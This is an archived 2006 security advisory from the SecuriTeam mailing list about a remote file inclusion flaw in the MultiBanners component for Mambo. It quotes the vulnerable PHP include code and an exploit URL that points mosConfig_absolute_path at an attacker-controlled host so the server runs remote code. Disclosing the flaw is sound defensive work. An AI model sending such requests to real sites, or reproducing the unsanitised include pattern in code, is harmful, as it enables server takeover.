[UNIX] Com MultiBanners File Inclusion (mosConfig_absolute_path)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 23 Jul 2006 16:11:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Com MultiBanners File Inclusion (mosConfig_absolute_path)
------------------------------------------------------------------------
SUMMARY
With <http://mamboxchange.com/projects/multibanners/> MultiBanners "you
can show up to four banners on one page. A MultiBanner can link to the
Internet or to a page of the local web". A file inclusion vulnerability in
MultiBanners allows remote attackers to cause the PHP script include
arbitrary code into its execution path.
DETAILS
Vulnerable code from extadminmenus.class.php:
if (phpversion() < '4.2.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );
}
if (phpversion() < '4.3.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );
}
Exploit:
The following URL will cause the server to include the file found on the
[attacker]'s web page:
http://site.com/[path]//administrator/components/com_multibanners/extadminmenus.class.php? mosConfig_absolute_path=[attacker]
ADDITIONAL INFORMATION
The information has been provided by <mailto:mail@xxxxxxxxxxxx> Blue|Spy.
The original article can be found at:
<http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt>
http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] Apache Tomcat 5.x.x Directory Listing
- Next by Date: [UNIX] Micro Guestbook XSS
- Previous by thread: [UNIX] Apache Tomcat 5.x.x Directory Listing
- Next by thread: [UNIX] Micro Guestbook XSS
- Index(es):
Relevant Pages
|